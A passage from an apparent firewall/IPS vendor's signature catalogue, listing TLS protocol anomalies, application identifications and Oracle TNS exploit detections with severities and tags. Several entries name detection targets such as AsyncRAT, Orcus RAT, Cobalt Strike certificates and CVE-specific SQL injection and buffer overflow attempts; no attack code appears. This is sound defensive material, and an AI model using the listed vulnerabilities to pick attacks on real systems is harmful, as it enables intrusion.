First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-605-5211
Description: The server has does not support the protocols given by the client in the Client Hello message. The session will close.
Back to top

TLS_Server-Rejected-Early-Data

About this situation: TLS early data was rejected by server
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: The TLS server has decided to reject early data, even though NGFW engine was able to process it.
Back to top

TLS_Server-Server-Name-Certificate-Mismatch

About this situation: Certificate does not match the server name given by the client
Context: TLS without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-597-5211
Description: The Client hello message contained a Server Name Indication extension which does not match the server certificate. This may be caused by the server not supporting the Server Name Indication extension.
Back to top

TLS_Server-Server-Name-Certificate-Mismatch-Overridden

About this situation: Certificate does not match the server name given by the client
Context: TLS without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-1332-5242
Last changed: sgpkg-ips-1332-5242
Description: The Client hello message contained a Server Name Indication extension which does not match the server certificate. This may be caused by the server not supporting the Server Name Indication extension. The rule configuration has disabled certificate validation, and the mismatch will be ignored.
Back to top

TLS_Server-SNI-Rejected

About this situation: Server rejected the Server Name Indication extension from client
Context: TLS without parameters
Severity: 5
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-603-5211
Description: The server has rejected the Server Name Indication extension given by the client.
Back to top

TLS_Server-Syntax-Error

About this situation: Syntax error in TLS server stream
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-511-5211
Description: There was an unrecoverable syntax error in the TLS/SSL server stream. This can be caused by a server that does not actually use the TLS/SSL protocol or if the server uses a protocol version that is not supported by the TLS and HTTPS module.
Back to top

TLS_Server-Unexpected-Certificate

About this situation: Unexpected server certificate in a TLS connection
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: TLS server certificate fetching has been enabled in the engine properties, a cached server certificate was processed by the engine during TLS Client Hello, but the certificate provided by the server during the TLS connection did not match the cached server certificate. This may be because of a recently changed server certificate. The matches made based on the cached certificate will be invalidated, and replaced with matches from the actual server certificate.
Back to top

TLS_SNI-Denied-Decrypting-And-Certificate-Mismatch

About this situation: Decrypting was disabled based on SNI, but it did not match server certificate
Context: TLS without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The server name in the Server Name Indication (SNI) extension of the TLS ClientHello message does not match to the server's certificate, perhaps due to certificate misconfiguration or malicious intent. In addition, the certificate indicates that the connection should be decrypted (either no domain names deny decrypting or certificate verification failed), but it is no longer possible to decrypt the connection as decrypting was denied earlier based on the server name. This could be an evasion attempt.
Back to top

TLS_SNI-Denied-Decrypting-And-Certificate-Verify-Failed

About this situation: Decrypting was disabled based on SNI, but server certificate verification failed
Context: TLS without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Server certificate verification failed, meaning that the connection should be decrypted. However, it is no longer possible to decrypt the connection, because decrypting has been denied earlier based on the server name in the Server Name Indication (SNI) extension of the TLS ClientHello message. This could be an evasion attempt.
Back to top

TLS_SNI-Processed

About this situation: TLS SNI extension was processed successfully
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-996-5242
Description: The server name in a Server Name Indication (SNI) extension of a TLS ClientHello message was processed. Possible URL filtering and categorization was completed for this handshake.
Back to top

TLS_SS-AsyncRAT-Infection-Traffic

About this situation: AsyncRAT infection traffic was detected
Context: TLS Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1361-5242
Last changed: sgpkg-ips-1361-5242
Vulnerability: AsyncRAT-Infection-Traffic
Description:
Back to top

TLS_SS-Cobalt-Strike-Self-Signed-TLS-Certificate

About this situation: A Self-signed TLS certificate of Cobalt Strike was detected
Context: TLS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Attack Related Anomalies, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1268-5242
Last changed: sgpkg-ips-1383-5242
Vulnerability: Cobalt-Strike-Self-Signed-TLS-Certificate
Description:
Back to top

TLS_SS-Microsoft-Windows-CryptoAPI-Spoofing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TLS Server Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1216-5242
Last changed: sgpkg-ips-1216-5242
Vulnerability: Microsoft-Windows-CryptoAPI-Spoofing-Vulnerability
Description:
Back to top

TLS_SS-Microsoft-Windows-TLS-Key-Exchange-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in the Microsoft Windows TLS library detected.
Context: TLS Server Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1378-5242
Last changed: sgpkg-ips-1378-5242
Vulnerability: Microsoft-Windows-TLS-Key-Exchange-Denial-Of-Service
Description:
Back to top

TLS_SS-OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: TLS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Vulnerability: OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption
Description:
Back to top

TLS_SS-OpenSSL-X.509-IPAddressFamily-Extension-Parsing-Out-of-Bounds-Read

About this situation: An OpenSSL X.509 IPAddressFamily Extension Parsing Out-of-Bounds Read vulnerability
Context: TLS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2017, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-983-5242
Vulnerability: OpenSSL-X.509-IPAddressFamily-Extension-Parsing-Out-of-Bounds-Read
Description:
Back to top

TLS_SS-OpenSSL-X.509-Punycode-Email-Address-BOF

About this situation: An attempt to exploit a vulnerability in OpenSSL detected
Context: TLS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1551-5242
Vulnerability: OpenSSL-X.509-Email-Address-4-Byte-Buffer-Overflow-CVE-2022-3602
OpenSSL-Email-Address-Variable-Length-Buffer-Overflow-CVE-2022-3786
Description:
Back to top

TLS_SS-Orcus-RAT-Infection-Traffic

About this situation: Orcus RAT infection traffic was detected
Context: TLS Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1374-5242
Last changed: sgpkg-ips-1374-5242
Vulnerability: Orcus-RAT-Infection-Traffic
Description:
Back to top

TLS_SS-Self-Signed-Certificate-With-Default-Values

About this situation: A self-signed certificate with default values was detected
Context: TLS Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Vulnerability: Self-Signed-Certificate-With-Default-Values
Description:
Back to top

TLS_SS-SSL-Certificate-In-Nonstandard-Port

About this situation: An SSL certificate was detected
Context: TLS Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-1563-5242
Vulnerability: SSL-Certificate-In-Nonstandard-Port
Description:
Back to top

TLS_SS-Supermicro-IPMI-Static-SSL-Certificate

About this situation: An attempt to exploit a Supermicro IPMI Static SSL Certificate vulnerability detected.
Context: TLS Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Supermicro Onboard IPMI, CVE2013, Any Operating System not specific, Potential Disclosure, TCP Server Traffic
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-766-5211
Vulnerability: Supermicro-IPMI-Static-SSL-Certificate
Description:
Back to top

TLS_SS-Suspicious-Common-Name

About this situation: Probable tunneling over TLS, such as TOR
Context: TLS Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-1021-5242
Last changed: sgpkg-ips-1021-5242
Description:
Back to top

TLS_SS-Windows-Schannel-Denial-Of-Service-CVE-2023-21818

About this situation: An attempt to exploit a vulnerability in Windows Schannel detected
Context: TLS Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-02, CVE2023, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1557-5242
Last changed: sgpkg-ips-1557-5242
Vulnerability: Windows-Schannel-Denial-Of-Service-CVE-2023-21818
Description:
Back to top

TLS_SSL-2-0

About this situation: SSL 2.0 used in SSL connection
Context: TLS without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Vulnerability: Microsoft-Windows-Ssl-And-Tls-Security-Feature-Bypass
Description: TLS/SSL client and server negotiated SSL 2.0 protocol version to be used in the connection. SSL 2.0 is not secure.
Back to top

TLS_SSL-3-0

About this situation: SSL 3.0 used in SSL connection
Context: TLS without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-1358-5242
Description: TLS/SSL client and server negotiated SSL 3.0 protocol version to be used in the connection. This protocol version is not secure, and it has been deprecated since 2015 by RFC 7568: https://datatracker.ietf.org/doc/html/rfc7568
Back to top

TLS_SS_Windows-CryptoAPI-Spoofing-Vulnerability-CVE-2022-34689

About this situation: An attempt to exploit a vulnerability in Windows CryptoAPI detected
Context: TLS Server Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2022, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1557-5242
Vulnerability: Windows-CryptoAPI-Spoofing-Vulnerability-CVE-2022-34689
Description:
Back to top

TLS_STARTTLS-Not-TLS

About this situation: The connection does not look like using TLS/SSL after STARTTLS negotiation
Context: TLS without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1536-5242
Last changed: sgpkg-ips-1536-5242
Description: The connection does not look like using TLS/SSL after STARTTLS command has been used to start TLS negotiation.
Back to top

TLS_Tentative-TLS-Application

About this situation: Tentative TLS Application Detected
Context: ProtoId without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1105-5242
Description: After valid TLS client message has been processed this situation will be produced for enabling the TLS application to match prior the TLS server reply has been inspected. Later when the real TLS server reply has been inspected the TLS appication match will be finalized or some other application match will be produced if the server's reply is not TLS.
Back to top

TLS_TLS-1-0

About this situation: TLS 1.0 used in TLS connection
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Description: TLS/SSL client and server negotiated TLS 1.0 protocol version to be used in the connection.
Back to top

TLS_TLS-1-1

About this situation: TLS 1.1 used in TLS connection
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Description: TLS/SSL client and server negotiated TLS 1.1 protocol version to be used in the connection.
Back to top

TLS_TLS-1-1-Downgrade-Seen

About this situation: A downgrade from TLS 1.3 to 1.1 or below was detected
Context: TLS without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: A TLS server supporting TLS 1.3 has received a Client Hello negotiating TLS 1.1 or below. This could indicate that the TLS protocol version has been downgraded by a device between the NGFW and TLS server.
Back to top

TLS_TLS-1-2

About this situation: TLS 1.2 used in TLS connection
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Description: TLS/SSL client and server negotiated TLS 1.2 protocol version to be used in the connection.
Back to top

TLS_TLS-1-2-Downgrade-Seen

About this situation: A downgrade from TLS 1.3 to 1.2 was detected
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: A TLS server supporting TLS 1.3 has received a Client Hello negotiating TLS 1.2. This could indicate that the TLS protocol version has been downgraded by a device between the NGFW and TLS server.
Back to top

TLS_TLS-1-3

About this situation: TLS 1.3 used in TLS connection
Context: TLS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: TLS/SSL client and server negotiated TLS 1.3 protocol version to be used in the connection.
Back to top

TLS_Too-Long-Handshake-Message

About this situation: TLS Handshake message was too long
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: TLS/SSL inspection was in use and an unusually long handshake message was received. This may indicate that the connection is not actually using TLS/SSL. Even though long handshake messages are allowed by the protocol, they are rather uncommon and not allowed in the TLS/SSL inspection to protect the inspection engine from denial of service by memory exhaustion. If the TCP payload data was already modified in this connection because of TLS/SSL inspection, the connection cannot be continued and the situation TLS_Unrecoverable-Error is generated. If the connection wasn't (yet) modified, the connection will be continued without TLS/SSL decrypting, if there is no Terminate action specified for any situations detected in the connection.
Back to top

TLS_Too-Long-Session-Ticket

About this situation: Too long TLS session ticket was seen
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Description: The session ticket sent by the TLS server was so long that it is not possible to include the necessary additional data in the ticket before passing it on to the client, when doing SSL/TLS inspection. This should not happen often, because the ticket length limit (64KB) is more than adequate in normal SSL connections. This kind of ticket is not passed on to the client in SSL/TLS inspection. This means that the client has to initiate a full SSL/TLS handshake for the next connection to the same server, but the connections should work normally otherwise.
Back to top

TLS_Unexpected-Begin-of-Encrypted-Data

About this situation: Unexpected begin of encrypted data in an SSL/TLS connection
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Description: A Change Cipher Spec message was seen in an SSL/TLS connection without key agreement or session resumption. This should normally not happen. The connection will not be decrypted, but it is likely that the connection cannot go on for long, because as far as the engine can tell, the client and the server have not exchanged enough information to share a secret key.
Back to top

TLS_Unexpected-Change-Cipher

About this situation: Unexpected TLS/SSL Change Cipher Spec message
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Unexpected Change Cipher Spec message was seen. This can be caused by an error in the client/server software or by an attack attempt to modify the message contents. The action for this situation is always Terminate.
Back to top

TLS_Unexpected-Client-Hello

About this situation: A TLS Client Hello message was seen, when not expected
Context: TLS without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: The TLS client has sent a second Client Hello message, when it was not expected. TLS 1.3 only prohibits another Client Hello message after Hello Retry Request message.
Back to top

TLS_Unexpected-Extension

About this situation: A TLS handshake message contained an unexpected extension
Context: TLS without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: The TLS client or server has sent a TLS handshake message containing an extension that the NGFW engine supports but the extension is not specified for the message in question.
Back to top

TLS_Unexpected-New-Session-Ticket

About this situation: Unexpected New Session Ticket message from TLS server was seen
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Description: TLS server sent a New Session Ticket message too early in a handshake message sequence, when the symmetric cipher key has not yet been agreed. This should normally not happen. The ticket is not passed to the client to prevent the client later using this anomalous ticket.
Back to top

TLS_Unknown-Session-Id

About this situation: Unknown session ID was seen in an SSL/TLS connection
Context: TLS without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-571-5211
Description: TLS server used a shortened handshake sequence, apparently based on the session id sent by the client, and the engine does not have the corresponding session information available. This can happen if a session was established before the SSL/TLS inspection was started in this engine, or if the session was originally established in a different cluster node. Session information can also be lost if the session cache becomes full in the engine. The connection will not be decrypted.
Back to top

TLS_Unknown-Session-Ticket

About this situation: Unknown TLS session ticket used by the client
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Description: TLS server used a shortened handshake sequence, apparently based on the session ticket sent by the client. The engine does not recognize the ticket. This can happen if a session was established before the TLS inspection was started in this engine, or if the session was originally established in a different cluster node. The connection will not be decrypted.
Back to top

TLS_Unrecoverable-Error

About this situation: Unrecoverable error in TLS/SSL record layer
Context: TLS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: There was an unrecoverable error in the TLS/SSL record layer inline processing. This can be caused by client/server software that does not actually use the TLS/SSL protocol or by an internal error in the TLS/SSL inspection. The connection cannot be continued; the action for this situation is always Terminate.
Back to top

TLS_Unsupported

About this situation: Unsupported TLS/SSL parameters
Context: TLS without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: TLS/SSL client and server negotiated an unsupported parameter combination. The data in the connection after this handshake will not be decrypted anymore.
Back to top

TLS_Using-Expired-Server-Credentials

About this situation: Using expired server credentials in TLS inspection
Context: TLS without parameters
Severity: 5
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-421-4219
Description: The server is using an expired certificate, but since the server certificate belongs to the server credentials configured for the engine, the connection is inspected normally. It is however likely that the client will not trust the server because the certificate has expired.
Back to top

Tmall

About this situation: Tmall usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-625-5211
Description: Tmall is a Chinese online shopping site.
Back to top

TMXmoney

About this situation: Application TMXmoney detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TMXmoney is a financial portal.
Back to top

TNS-Metrix

About this situation: TNS Metrix usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-602-5211
Description: TNS Metrix is a web advertising and statistic collection service.
Back to top

TNS_CS-Oracle-Create-Database-Link-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Database Server detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database Server, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-574-5211
Vulnerability: Oracle-Create-Database-Link-Buffer-Overflow
Description:
Back to top

TNS_CS-Oracle-Database-Core-Rdbms-Component-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Oracle Database Server detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 9i, Oracle 10g, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Oracle-Database-Core-Rdbms-Component-Denial-Of-Service
Description:
Back to top

TNS_CS-Oracle-Database-Ctxsys.drvdisp.tablefunc_asown-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Database detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2011, Any Operating System not specific, Oracle Database not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-423-4219
Last changed: sgpkg-ips-423-4219
Vulnerability: Oracle-Database-Ctxsys.drvdisp.tablefunc_asown-Buffer-Overflow
Description:
Back to top

TNS_CS-Oracle-Database-DBMS-Java.Set-Output-To-Java-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Oracle Database Server detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 11g, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-285-4219
Last changed: sgpkg-ips-285-4219
Vulnerability: Oracle-Database-DBMS_Java.Set_Output_To_Java-Privilege-Escalation
Description:
Back to top

TNS_CS-Oracle-Database-DBMS-Scheduler-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Oracle Application Server detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Application Server, Oracle Database Server, CVE2005, Any Operating System not specific, Oracle Application Server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-423-4219
Last changed: sgpkg-ips-423-4219
Vulnerability: Oracle-Database-DBMS-Scheduler-Privilege-Escalation
Description:
Back to top

TNS_CS-Oracle-Database-Mdsys.sdo_Topo_Drop_ftbl-SQL-Injection-Vulnerability

About this situation: An attempt to exploit a vulnerability in Oracle Oracle Database detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 10g, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Oracle-Database-Trigger-Mdsys.sdo_Topo_Drop_ftbl-SQL-Injection-Vulnerability
Description:
Back to top

TNS_CS-Oracle-Database-Server-Authentication-Username-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in Oracle Database Server detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Windows, Any Hardware, Oracle 8i, Oracle 9i, CVE2003, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-119-2032
Last changed: sgpkg-ips-277-4219
Vulnerability: Oracle-Database-Server-Authentication-Username-Buffer-Overflow
Description:
Back to top

TNS_CS-Oracle-Database-Server-DBMS-DCD-PUBLISH-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Oracle Database server over TNS detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 9i, CVE2010, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-303-4219
Last changed: sgpkg-ips-303-4219
Vulnerability: Oracle-Database-Server-DBMS-CDC-PUBLISH-SQL-Injection
Description:
Back to top

TNS_CS-Oracle-Database-Server-Lpxfsmsax-Qname-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Database Server detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database Server, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-599-5211
Vulnerability: Oracle-Database-Server-Lpxfsmsax-Qname-Stack-Buffer-Overflow
Description:
Back to top

TNS_CS-Oracle-Database-Server-Workspace-Manager-Multiple-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Oracle Database Server detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 9i, Oracle 10g, Oracle 11g, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-229-3038
Last changed: sgpkg-ips-410-4219
Vulnerability: Oracle-Database-Server-Workspace-Manager-Multiple-SQL-Injection
Description:
Back to top

TNS_CS-Oracle-Database-Server-XDB-Pitrig-Procedures-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Oracle Database Server detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Application Server, Oracle Database Server, Any Operating System not specific, Oracle Application Server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Oracle-Database-Server-XDB-Pitrig-Procedures-SQL-Injection
Description:
Back to top

TNS_CS-Oracle-Database-SQL-Compiler-Access-Control-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Oracle Oracle Database detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2007, Any Operating System not specific, Oracle Database not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-SQL-Compiler-Access-Control-Security-Bypass
Description:
Back to top

TNS_CS-Oracle-Database-Sys.lt.findricset-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Oracle Database Server detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database Server, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Oracle-Database-Sys.lt.findricset-SQL-Injection
Description:
Back to top

TNS_CS-Oracle-Database-SYS.OLAPIMPL-T-Package-ODCITABLESTART-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Oracle Database detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2008, Any Operating System not specific, Oracle Database not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-423-4219
Last changed: sgpkg-ips-761-5211
Vulnerability: Oracle-Database-SYS.OLAPIMPL_T-Package-ODCITABLESTART-Buffer-Overflow
Description:
Back to top

TNS_CS-Oracle-Database-XDB-Pitrig-dropmetadata-Procedure-BOF

About this situation: An attempt to exploit buffer overflow vulnerability in Oracle Database Server detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 10g, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-130-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-XDB-Pitrig-dropmetadata-Procedure-BOF
Description:
Back to top

TNS_CS-Suspicious-Request

About this situation: A suspicious TNS request detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-498-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

TNS_CS_Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection

About this situation: Detects SQL Injection attacks against the Oracle Database Server SYS.KUPW$WORKER package
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2006, Any Operating System not specific, Oracle Database not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-423-4219
Last changed: sgpkg-ips-423-4219
Vulnerability: Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection
Description:
Back to top

TNS_NGSS-Driver-Detected

About this situation: NGS Software TNS driver detected
Context: Oracle TNS Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-425-4219
Last changed: sgpkg-ips-425-4219
Description:
Back to top

